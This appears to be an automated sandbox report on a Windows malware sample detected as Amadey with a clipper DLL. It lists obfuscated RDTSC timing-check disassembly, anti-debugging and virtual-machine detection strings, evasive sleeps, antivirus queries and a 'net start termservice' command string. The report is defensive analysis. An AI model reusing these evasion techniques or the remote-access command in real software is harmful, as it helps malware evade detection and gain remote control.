Source: C:\Users\user\Desktop\FRCe39S0oE.exe RDTSC instruction interceptor: First address: 50109AA second address: 5010A00 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F1328EC0E01h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 xchg eax, ebp 0x0000000a pushad 0x0000000b pushfd 0x0000000c jmp 00007F1328EC0DFCh 0x00000011 adc ecx, 1C010768h 0x00000017 jmp 00007F1328EC0DFBh 0x0000001c popfd 0x0000001d pushad 0x0000001e mov dx, ax 0x00000021 push eax 0x00000022 pop edx 0x00000023 popad 0x00000024 popad 0x00000025 mov ebp, esp 0x00000027 jmp 00007F1328EC0DFCh 0x0000002c push FFFFFFFEh 0x0000002e push eax 0x0000002f push edx 0x00000030 pushad 0x00000031 mov ecx, ebx 0x00000033 mov cl, dl 0x00000035 popad 0x00000036 rdtsc
Source: C:\Users\user\Desktop\FRCe39S0oE.exe RDTSC instruction interceptor: First address: 5010A00 second address: 5010A06 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\Desktop\FRCe39S0oE.exe RDTSC instruction interceptor: First address: 5010A06 second address: 5010A0A instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\FRCe39S0oE.exe RDTSC instruction interceptor: First address: 5010A0A second address: 5010A7E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push 1704FB08h 0x0000000d pushad 0x0000000e mov si, BA4Bh 0x00000012 mov dl, al 0x00000014 popad 0x00000015 xor dword ptr [esp], 60D83B10h 0x0000001c jmp 00007F132877E3B3h 0x00000021 push 225EC2E9h 0x00000026 pushad 0x00000027 jmp 00007F132877E3B5h 0x0000002c movzx esi, dx 0x0000002f popad 0x00000030 xor dword ptr [esp], 558D6CE9h 0x00000037 jmp 00007F132877E3B3h 0x0000003c mov eax, dword ptr fs:[00000000h] 0x00000042 push eax 0x00000043 push edx 0x00000044 push eax 0x00000045 push edx 0x00000046 push eax 0x00000047 push edx 0x00000048 rdtsc
Source: C:\Users\user\Desktop\FRCe39S0oE.exe RDTSC instruction interceptor: First address: 5010A7E second address: 5010A82 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\FRCe39S0oE.exe RDTSC instruction interceptor: First address: 5010A82 second address: 5010A86 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\FRCe39S0oE.exe RDTSC instruction interceptor: First address: 5010A86 second address: 5010A8C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\FRCe39S0oE.exe RDTSC instruction interceptor: First address: 5010A8C second address: 5010B4B instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 call 00007F132877E3B8h 0x00000008 pop esi 0x00000009 mov ecx, edi 0x0000000b popad 0x0000000c pop edx 0x0000000d pop eax 0x0000000e push ebp 0x0000000f jmp 00007F132877E3AAh 0x00000014 mov dword ptr [esp], eax 0x00000017 pushad 0x00000018 pushfd 0x00000019 jmp 00007F132877E3AEh 0x0000001e adc eax, 3A2B68D8h 0x00000024 jmp 00007F132877E3ABh 0x00000029 popfd 0x0000002a pushfd 0x0000002b jmp 00007F132877E3B8h 0x00000030 sbb si, 3338h 0x00000035 jmp 00007F132877E3ABh 0x0000003a popfd 0x0000003b popad 0x0000003c sub esp, 1Ch 0x0000003f pushad 0x00000040 pushfd 0x00000041 jmp 00007F132877E3B4h 0x00000046 xor ecx, 3161AD98h 0x0000004c jmp 00007F132877E3ABh 0x00000051 popfd 0x00000052 push eax 0x00000053 push edx 0x00000054 jmp 00007F132877E3B6h 0x00000059 rdtsc
Source: C:\Users\user\Desktop\FRCe39S0oE.exe RDTSC instruction interceptor: First address: 5010B4B second address: 5010B4F instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\FRCe39S0oE.exe RDTSC instruction interceptor: First address: 5010B4F second address: 5010B8E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 popad 0x00000007 xchg eax, ebx 0x00000008 pushad 0x00000009 mov ebx, ecx 0x0000000b mov edi, ecx 0x0000000d popad 0x0000000e push eax 0x0000000f pushad 0x00000010 pushfd 0x00000011 jmp 00007F132877E3ABh 0x00000016 add cx, 63BEh 0x0000001b jmp 00007F132877E3B9h 0x00000020 popfd 0x00000021 push eax 0x00000022 push edx 0x00000023 mov edx, ecx 0x00000025 rdtsc
Source: C:\Users\user\Desktop\FRCe39S0oE.exe RDTSC instruction interceptor: First address: 5010B8E second address: 5010BE8 instructions: 0x00000000 rdtsc 0x00000002 mov si, 9959h 0x00000006 pop edx 0x00000007 pop eax 0x00000008 popad 0x00000009 xchg eax, ebx 0x0000000a push eax 0x0000000b push edx 0x0000000c pushad 0x0000000d pushfd 0x0000000e jmp 00007F1328EC0E01h 0x00000013 sbb ecx, 2BF780A6h 0x00000019 jmp 00007F1328EC0E01h 0x0000001e popfd 0x0000001f pushfd 0x00000020 jmp 00007F1328EC0E00h 0x00000025 xor ax, D648h 0x0000002a jmp 00007F1328EC0DFBh 0x0000002f popfd 0x00000030 popad 0x00000031 rdtsc
Source: C:\Users\user\Desktop\FRCe39S0oE.exe RDTSC instruction interceptor: First address: 5010BE8 second address: 5010C9B instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 call 00007F132877E3AFh 0x00000008 pop esi 0x00000009 push ebx 0x0000000a pop esi 0x0000000b popad 0x0000000c pop edx 0x0000000d pop eax 0x0000000e push ebx 0x0000000f jmp 00007F132877E3B0h 0x00000014 mov dword ptr [esp], esi 0x00000017 jmp 00007F132877E3B0h 0x0000001c xchg eax, edi 0x0000001d pushad 0x0000001e call 00007F132877E3AEh 0x00000023 mov ch, 26h 0x00000025 pop ebx 0x00000026 pushfd 0x00000027 jmp 00007F132877E3ACh 0x0000002c add ch, 00000068h 0x0000002f jmp 00007F132877E3ABh 0x00000034 popfd 0x00000035 popad 0x00000036 push eax 0x00000037 jmp 00007F132877E3B9h 0x0000003c xchg eax, edi 0x0000003d jmp 00007F132877E3AEh 0x00000042 mov eax, dword ptr [77DEB370h] 0x00000047 push eax 0x00000048 push edx 0x00000049 jmp 00007F132877E3B7h 0x0000004e rdtsc
Source: C:\Users\user\Desktop\FRCe39S0oE.exe RDTSC instruction interceptor: First address: 5010C9B second address: 5010CB3 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007F1328EC0E04h 0x00000009 rdtsc
Source: C:\Users\user\Desktop\FRCe39S0oE.exe RDTSC instruction interceptor: First address: 5010CB3 second address: 5010CE5 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F132877E3ABh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pop edx 0x0000000a pop eax 0x0000000b xor dword ptr [ebp-08h], eax 0x0000000e push eax 0x0000000f push edx 0x00000010 pushad 0x00000011 mov eax, edi 0x00000013 call 00007F132877E3B7h 0x00000018 pop ecx 0x00000019 popad 0x0000001a rdtsc
Source: C:\Users\user\Desktop\FRCe39S0oE.exe RDTSC instruction interceptor: First address: 5010CE5 second address: 5010D0C instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 mov bl, cl 0x00000005 jmp 00007F1328EC0E01h 0x0000000a popad 0x0000000b pop edx 0x0000000c pop eax 0x0000000d xor eax, ebp 0x0000000f push eax 0x00000010 push edx 0x00000011 jmp 00007F1328EC0DFAh 0x00000016 rdtsc
Source: C:\Users\user\Desktop\FRCe39S0oE.exe RDTSC instruction interceptor: First address: 5010D0C second address: 5010D12 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\Desktop\FRCe39S0oE.exe RDTSC instruction interceptor: First address: 5010D12 second address: 5010D35 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F1328EC0DFDh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pop edx 0x0000000a pop eax 0x0000000b nop 0x0000000c push eax 0x0000000d push edx 0x0000000e jmp 00007F1328EC0DFDh 0x00000013 rdtsc
Source: C:\Users\user\Desktop\FRCe39S0oE.exe RDTSC instruction interceptor: First address: 5010D35 second address: 5010DB9 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 call 00007F132877E3B7h 0x00000008 pop esi 0x00000009 pushfd 0x0000000a jmp 00007F132877E3B9h 0x0000000f xor al, 00000026h 0x00000012 jmp 00007F132877E3B1h 0x00000017 popfd 0x00000018 popad 0x00000019 pop edx 0x0000001a pop eax 0x0000001b push eax 0x0000001c pushad 0x0000001d call 00007F132877E3B7h 0x00000022 mov dl, ah 0x00000024 pop edi 0x00000025 mov ax, E2D1h 0x00000029 popad 0x0000002a nop 0x0000002b push eax 0x0000002c push edx 0x0000002d jmp 00007F132877E3B3h 0x00000032 rdtsc
Source: C:\Users\user\Desktop\FRCe39S0oE.exe RDTSC instruction interceptor: First address: 5010DB9 second address: 5010DBF instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\FRCe39S0oE.exe RDTSC instruction interceptor: First address: 5010DBF second address: 5010DC3 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\FRCe39S0oE.exe RDTSC instruction interceptor: First address: 5010DC3 second address: 5010DC7 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\FRCe39S0oE.exe RDTSC instruction interceptor: First address: 5010DC7 second address: 5010E54 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 lea eax, dword ptr [ebp-10h] 0x0000000b jmp 00007F132877E3B7h 0x00000010 mov dword ptr fs:[00000000h], eax 0x00000016 jmp 00007F132877E3B6h 0x0000001b mov esi, dword ptr [ebp+08h] 0x0000001e pushad 0x0000001f mov si, 933Dh 0x00000023 mov eax, 2FA82639h 0x00000028 popad 0x00000029 mov eax, dword ptr [esi+10h] 0x0000002c pushad 0x0000002d call 00007F132877E3B1h 0x00000032 pushfd 0x00000033 jmp 00007F132877E3B0h 0x00000038 or eax, 70B78778h 0x0000003e jmp 00007F132877E3ABh 0x00000043 popfd 0x00000044 pop esi 0x00000045 popad 0x00000046 test eax, eax 0x00000048 pushad 0x00000049 push eax 0x0000004a push edx 0x0000004b mov bh, 59h 0x0000004d rdtsc
Source: C:\Users\user\Desktop\FRCe39S0oE.exe RDTSC instruction interceptor: First address: 5010E54 second address: 5010ED9 instructions: 0x00000000 rdtsc 0x00000002 mov dx, cx 0x00000005 pop edx 0x00000006 pop eax 0x00000007 call 00007F1328EC0E08h 0x0000000c mov dx, ax 0x0000000f pop eax 0x00000010 popad 0x00000011 jne 00007F139BB9FCA2h 0x00000017 pushad 0x00000018 mov ah, bl 0x0000001a call 00007F1328EC0E04h 0x0000001f pop ecx 0x00000020 popad 0x00000021 mov eax, 00000000h 0x00000026 pushad 0x00000027 jmp 00007F1328EC0E08h 0x0000002c jmp 00007F1328EC0E02h 0x00000031 popad 0x00000032 mov dword ptr [ebp-20h], eax 0x00000035 push eax 0x00000036 push edx 0x00000037 push eax 0x00000038 push edx 0x00000039 jmp 00007F1328EC0DFAh 0x0000003e rdtsc
Source: C:\Users\user\Desktop\FRCe39S0oE.exe RDTSC instruction interceptor: First address: 5010ED9 second address: 5010EDF instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\FRCe39S0oE.exe RDTSC instruction interceptor: First address: 5010EDF second address: 5010EFD instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F1328EC0DFEh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 mov ebx, dword ptr [esi] 0x0000000b pushad 0x0000000c mov cl, EAh 0x0000000e push eax 0x0000000f push edx 0x00000010 mov ebx, 7106D09Ch 0x00000015 rdtsc
Source: C:\Users\user\Desktop\FRCe39S0oE.exe RDTSC instruction interceptor: First address: 5010EFD second address: 5010F21 instructions: 0x00000000 rdtsc 0x00000002 mov ax, bx 0x00000005 pop edx 0x00000006 pop eax 0x00000007 popad 0x00000008 mov dword ptr [ebp-24h], ebx 0x0000000b pushad 0x0000000c mov bx, 98CCh 0x00000010 popad 0x00000011 test ebx, ebx 0x00000013 push eax 0x00000014 push edx 0x00000015 push eax 0x00000016 push edx 0x00000017 jmp 00007F132877E3ADh 0x0000001c rdtsc
Source: C:\Users\user\Desktop\FRCe39S0oE.exe RDTSC instruction interceptor: First address: 5010F21 second address: 5010F25 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\FRCe39S0oE.exe RDTSC instruction interceptor: First address: 5010F25 second address: 5010F2B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\FRCe39S0oE.exe RDTSC instruction interceptor: First address: 5010F2B second address: 5010F31 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\Desktop\FRCe39S0oE.exe RDTSC instruction interceptor: First address: 5010F31 second address: 5010F35 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\FRCe39S0oE.exe RDTSC instruction interceptor: First address: 4FF09E1 second address: 4FF0A8B instructions: 0x00000000 rdtsc 0x00000002 mov dl, D6h 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pushfd 0x00000007 jmp 00007F1328EC0DFEh 0x0000000c sbb ecx, 330EEE28h 0x00000012 jmp 00007F1328EC0DFBh 0x00000017 popfd 0x00000018 popad 0x00000019 xchg eax, ebp 0x0000001a jmp 00007F1328EC0E06h 0x0000001f push eax 0x00000020 pushad 0x00000021 pushad 0x00000022 mov bx, si 0x00000025 popad 0x00000026 pushfd 0x00000027 jmp 00007F1328EC0E06h 0x0000002c adc cx, 02E8h 0x00000031 jmp 00007F1328EC0DFBh 0x00000036 popfd 0x00000037 popad 0x00000038 xchg eax, ebp 0x00000039 jmp 00007F1328EC0E06h 0x0000003e mov ebp, esp 0x00000040 push eax 0x00000041 push edx 0x00000042 pushad 0x00000043 mov ebx, 519C4560h 0x00000048 jmp 00007F1328EC0E09h 0x0000004d popad 0x0000004e rdtsc
Source: C:\Users\user\Desktop\FRCe39S0oE.exe RDTSC instruction interceptor: First address: 4FF0A8B second address: 4FF0A9E instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 movsx edx, cx 0x00000006 movzx ecx, dx 0x00000009 popad 0x0000000a pop edx 0x0000000b pop eax 0x0000000c pop ebp 0x0000000d push eax 0x0000000e push edx 0x0000000f push eax 0x00000010 push edx 0x00000011 push eax 0x00000012 push edx 0x00000013 rdtsc
Source: C:\Users\user\Desktop\FRCe39S0oE.exe RDTSC instruction interceptor: First address: 4FF0A9E second address: 4FF0AA2 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\FRCe39S0oE.exe RDTSC instruction interceptor: First address: 4FF0AA2 second address: 4FF0AA8 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\AppData\Local\Temp\bb556cff4a\rapes.exe RDTSC instruction interceptor: First address: 358A32 second address: 358A38 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\AppData\Local\Temp\bb556cff4a\rapes.exe RDTSC instruction interceptor: First address: 358B59 second address: 358B63 instructions: 0x00000000 rdtsc 0x00000002 jns 00007F132877E3A6h 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
Source: C:\Users\user\AppData\Local\Temp\bb556cff4a\rapes.exe RDTSC instruction interceptor: First address: 358B63 second address: 358B70 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 popad 0x00000007 push eax 0x00000008 push edx 0x00000009 push eax 0x0000000a push edx 0x0000000b push eax 0x0000000c push edx 0x0000000d rdtsc
Source: C:\Users\user\AppData\Local\Temp\bb556cff4a\rapes.exe RDTSC instruction interceptor: First address: 358B70 second address: 358B7A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jl 00007F132877E3A6h 0x0000000a rdtsc
Tries to evade debugger and weak emulator (self modifying code)
Source: C:\Users\user\Desktop\FRCe39S0oE.exe Special instruction interceptor: First address: F028F3 instructions caused by: Self-modifying code
Source: C:\Users\user\Desktop\FRCe39S0oE.exe Special instruction interceptor: First address: F02836 instructions caused by: Self-modifying code
Source: C:\Users\user\Desktop\FRCe39S0oE.exe Special instruction interceptor: First address: 10A0954 instructions caused by: Self-modifying code
Source: C:\Users\user\AppData\Local\Temp\bb556cff4a\rapes.exe Special instruction interceptor: First address: 1E28F3 instructions caused by: Self-modifying code
Source: C:\Users\user\AppData\Local\Temp\bb556cff4a\rapes.exe Special instruction interceptor: First address: 1E2836 instructions caused by: Self-modifying code
Source: C:\Users\user\AppData\Local\Temp\bb556cff4a\rapes.exe Special instruction interceptor: First address: 380954 instructions caused by: Self-modifying code
Contains capabilities to detect virtual machines
Source: C:\Users\user\AppData\Local\Temp\bb556cff4a\rapes.exe Registry key queried: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Class\{4d36e968-e325-11ce-bfc1-08002be10318}\0000 name: DriverDesc Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\bb556cff4a\rapes.exe Registry key queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System name: SystemBiosVersion Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\bb556cff4a\rapes.exe Registry key queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System name: VideoBiosVersion Jump to behavior
Contains functionality for execution timing, often used to detect debuggers
Source: C:\Users\user\Desktop\FRCe39S0oE.exe Code function: 0_2_05040092 rdtsc 0_2_05040092
Contains long sleeps (>= 3 min)
Source: C:\Users\user\AppData\Local\Temp\bb556cff4a\rapes.exe Thread delayed: delay time: 180000 Jump to behavior
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Source: C:\Users\user\AppData\Local\Temp\bb556cff4a\rapes.exe Window / User API: threadDelayed 409 Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\bb556cff4a\rapes.exe Window / User API: threadDelayed 1792 Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\bb556cff4a\rapes.exe Window / User API: threadDelayed 1277 Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\bb556cff4a\rapes.exe Window / User API: threadDelayed 1487 Jump to behavior
Found dropped PE file which has not been started or loaded
Source: C:\Users\user\AppData\Local\Temp\bb556cff4a\rapes.exe Dropped PE file which has not been started: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\QI6Y9C7H\PqFatgo[1].exe Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\bb556cff4a\rapes.exe Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\10341500101\PqFatgo.exe Jump to dropped file
May sleep (evasive loops) to hinder dynamic analysis
Source: C:\Users\user\AppData\Local\Temp\bb556cff4a\rapes.exe TID: 6120 Thread sleep count: 43 > 30 Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\bb556cff4a\rapes.exe TID: 6120 Thread sleep time: -86043s >= -30000s Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\bb556cff4a\rapes.exe TID: 6032 Thread sleep count: 35 > 30 Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\bb556cff4a\rapes.exe TID: 6032 Thread sleep time: -70035s >= -30000s Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\bb556cff4a\rapes.exe TID: 6816 Thread sleep count: 409 > 30 Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\bb556cff4a\rapes.exe TID: 6816 Thread sleep time: -12270000s >= -30000s Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\bb556cff4a\rapes.exe TID: 6064 Thread sleep time: -540000s >= -30000s Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\bb556cff4a\rapes.exe TID: 3804 Thread sleep count: 1792 > 30 Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\bb556cff4a\rapes.exe TID: 3804 Thread sleep time: -3585792s >= -30000s Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\bb556cff4a\rapes.exe TID: 6980 Thread sleep count: 1277 > 30 Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\bb556cff4a\rapes.exe TID: 6980 Thread sleep time: -2555277s >= -30000s Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\bb556cff4a\rapes.exe TID: 6956 Thread sleep count: 1487 > 30 Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\bb556cff4a\rapes.exe TID: 6956 Thread sleep time: -2975487s >= -30000s Jump to behavior
Sample execution stops while process was sleeping (likely an evasion)
Source: C:\Windows\System32\conhost.exe Last function: Thread delayed
Source: C:\Users\user\Desktop\FRCe39S0oE.exe File Volume queried: C:\ FullSizeInformation Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\bb556cff4a\rapes.exe Thread delayed: delay time: 30000 Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\bb556cff4a\rapes.exe Thread delayed: delay time: 180000 Jump to behavior
Source: rapes.exe, rapes.exe, 00000002.00000002.1024719782.0000000000360000.00000040.00000001.01000000.00000007.sdmp Binary or memory string: HARDWARE\ACPI\DSDT\VBOX__
Source: FRCe39S0oE.exe, 00000000.00000002.980012291.0000000001080000.00000040.00000001.01000000.00000003.sdmp, rapes.exe, 00000001.00000002.1018937291.0000000000360000.00000040.00000001.01000000.00000007.sdmp, rapes.exe, 00000002.00000002.1024719782.0000000000360000.00000040.00000001.01000000.00000007.sdmp Binary or memory string: Restart now?\\.\Oreans.vxd%s\Oreans.vxdXprotEventHARDWARE\ACPI\DSDT\VBOX__SeShutdownPrivilegeSoftware\WinLicenseCreateEvent API Error while extraction the driverGetEnvironmentVariable API Error while extraction the driverOpenSCManager API Error while extraction the driverCreateService API Error while extraction the driverCloseServiceHandle API Error while extraction the driverOpenService API Error while extraction the driverStartService API Error while extraction the driverAPIC error: Cannot find Processors Control Blocks. Please,
Source: C:\Users\user\Desktop\FRCe39S0oE.exe System information queried: ModuleInformation Jump to behavior
Source: C:\Users\user\Desktop\FRCe39S0oE.exe Process information queried: ProcessInformation Jump to behavior

Anti Debugging
barindex
Hides threads from debuggers
Source: C:\Users\user\Desktop\FRCe39S0oE.exe Thread information set: HideFromDebugger Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\bb556cff4a\rapes.exe Thread information set: HideFromDebugger Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\bb556cff4a\rapes.exe Thread information set: HideFromDebugger Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\bb556cff4a\rapes.exe Thread information set: HideFromDebugger Jump to behavior
Tries to detect sandboxes and other dynamic analysis tools (window names)
Source: C:\Users\user\AppData\Local\Temp\bb556cff4a\rapes.exe Open window title or class name: regmonclass
Source: C:\Users\user\AppData\Local\Temp\bb556cff4a\rapes.exe Open window title or class name: gbdyllo
Source: C:\Users\user\AppData\Local\Temp\bb556cff4a\rapes.exe Open window title or class name: process monitor - sysinternals: www.sysinternals.com
Source: C:\Users\user\AppData\Local\Temp\bb556cff4a\rapes.exe Open window title or class name: procmon_window_class
Source: C:\Users\user\AppData\Local\Temp\bb556cff4a\rapes.exe Open window title or class name: registry monitor - sysinternals: www.sysinternals.com
Source: C:\Users\user\AppData\Local\Temp\bb556cff4a\rapes.exe Open window title or class name: ollydbg
Source: C:\Users\user\AppData\Local\Temp\bb556cff4a\rapes.exe Open window title or class name: filemonclass
Source: C:\Users\user\AppData\Local\Temp\bb556cff4a\rapes.exe Open window title or class name: file monitor - sysinternals: www.sysinternals.com
Checks for debuggers (devices)
Source: C:\Users\user\AppData\Local\Temp\bb556cff4a\rapes.exe File opened: NTICE
Source: C:\Users\user\AppData\Local\Temp\bb556cff4a\rapes.exe File opened: SICE
Source: C:\Users\user\AppData\Local\Temp\bb556cff4a\rapes.exe File opened: SIWVID
Checks if the current process is being debugged
Source: C:\Users\user\Desktop\FRCe39S0oE.exe Process queried: DebugPort Jump to behavior
Source: C:\Users\user\Desktop\FRCe39S0oE.exe Process queried: DebugPort Jump to behavior
Source: C:\Users\user\Desktop\FRCe39S0oE.exe Process queried: DebugPort Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\bb556cff4a\rapes.exe Process queried: DebugPort Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\bb556cff4a\rapes.exe Process queried: DebugPort Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\bb556cff4a\rapes.exe Process queried: DebugPort Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\bb556cff4a\rapes.exe Process queried: DebugPort Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\bb556cff4a\rapes.exe Process queried: DebugPort Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\bb556cff4a\rapes.exe Process queried: DebugPort Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\bb556cff4a\rapes.exe Process queried: DebugPort Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\bb556cff4a\rapes.exe Process queried: DebugPort Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\bb556cff4a\rapes.exe Process queried: DebugPort Jump to behavior
Contains functionality for execution timing, often used to detect debuggers
Source: C:\Users\user\Desktop\FRCe39S0oE.exe Code function: 0_2_05040092 rdtsc 0_2_05040092
Creates a process in suspended mode (likely to inject code)
Source: C:\Users\user\Desktop\FRCe39S0oE.exe Process created: C:\Users\user\AppData\Local\Temp\bb556cff4a\rapes.exe "C:\Users\user\AppData\Local\Temp\bb556cff4a\rapes.exe" Jump to behavior
Source: rapes.exe, rapes.exe, 00000002.00000002.1024719782.0000000000360000.00000040.00000001.01000000.00000007.sdmp Binary or memory string: 1iProgram Manager
Queries the volume information (name, serial number etc) of a device
Source: C:\Users\user\AppData\Local\Temp\bb556cff4a\rapes.exe Queries volume information: C:\Users\user\AppData\Local\Temp\bb556cff4a\rapes.exe VolumeInformation Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\bb556cff4a\rapes.exe Queries volume information: C:\Users\user\AppData\Local\Temp\10341500101\PqFatgo.exe VolumeInformation Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\bb556cff4a\rapes.exe Queries volume information: C:\Users\user\AppData\Local\Temp\10341500101\PqFatgo.exe VolumeInformation Jump to behavior
Checks if Antivirus/Antispyware/Firewall program is installed (via WMI)
Source: C:\Users\user\AppData\Local\Temp\bb556cff4a\rapes.exe WMI Queries: IWbemServices::ExecNotificationQuery - ROOT\SecurityCenter : SELECT * FROM __InstanceOperationEvent WHERE TargetInstance ISA &apos;AntiVirusProduct&apos; OR TargetInstance ISA &apos;FirewallProduct&apos; OR TargetInstance ISA &apos;AntiSpywareProduct&apos;
Source: C:\Program Files\Windows Defender\MpCmdRun.exe WMI Queries: IWbemServices::CreateInstanceEnum - root\SecurityCenter2 : AntiVirusProduct
Source: C:\Program Files\Windows Defender\MpCmdRun.exe WMI Queries: IWbemServices::CreateInstanceEnum - root\SecurityCenter2 : AntiVirusProduct

Stealing of Sensitive Information
barindex
Yara detected Amadey
Source: Yara match File source: decrypted.memstr, type: MEMORYSTR
Yara detected Amadeys Clipper DLL
Source: Yara match File source: 00000000.00000002.979950125.0000000000E91000.00000040.00000001.01000000.00000003.sdmp, type: MEMORY
Source: Yara match File source: 00000002.00000002.1024637445.0000000000171000.00000040.00000001.01000000.00000007.sdmp, type: MEMORY
Source: Yara match File source: 00000002.00000003.984347300.0000000004DE0000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 0000000B.00000003.1548416588.0000000004960000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000000.00000003.933337144.0000000004E10000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000001.00000003.978435837.0000000004960000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000001.00000002.1018856608.0000000000171000.00000040.00000001.01000000.00000007.sdmp, type: MEMORY

Remote Access Functionality
barindex
Contains functionality to start a terminal service
Source: FRCe39S0oE.exe String found in binary or memory: net start termservice
Source: FRCe39S0oE.exe, 00000000.00000002.979950125.0000000000E91000.00000040.00000001.01000000.00000003.sdmp String found in binary or memory: net start termservice
